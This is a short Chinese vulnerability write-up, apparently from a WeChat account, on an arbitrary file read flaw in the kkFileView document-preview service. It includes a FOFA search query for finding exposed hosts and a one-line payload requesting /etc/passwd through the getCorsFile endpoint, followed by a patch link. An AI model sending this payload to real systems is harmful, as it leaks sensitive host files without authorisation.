kkFileview存在任意文件读取漏洞

kkFileview存在任意文件读取漏洞

1. kkFileview简介

微信公众号搜索：南风漏洞复现文库
该文章 南风漏洞复现文库 公众号首发

kkFileView，一款成熟且开源的文件文档在线预览项目解决方案。kkFileView为文件文档在线预览解决方案，该项目使用流行的spring boot搭建，易上手和部署，基本支持主流办公文档的在线预览，如doc,docx,xls,xlsx,ppt,pptx,pdf,txt,zip,rar,图片,视频,音频等等

2.漏洞描述

Keking KkFileview是中国凯京科技（Keking）公司的一个 Spring-Boot 打造文件文档在线预览项目。
Keking kkFileview 存在安全漏洞，该漏洞源于存在通过目录遍历漏洞读取任意文件，可能导致相关主机上的敏感文件泄漏。

3.影响版本

4.fofa 查询语句

body=“kkFileView”

5.漏洞复现

漏洞数据包如下，因为浏览器编码的原因，直接访问链接不会触发漏洞，需要以数据包的形式访问:

http://127.0.0.1/getCorsFile?urlPath=file:///etc/passwd

6.POC&EXP

关注公众号 南风漏洞复现文库 并回复 漏洞复现24 即可获得该 POC 工具下载地址：

本次的 poc 加入了代理功能，方便各位师傅调试。

7.整改意见

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://github.com/kekingcn/kkFileView/issues/304

8.往期回顾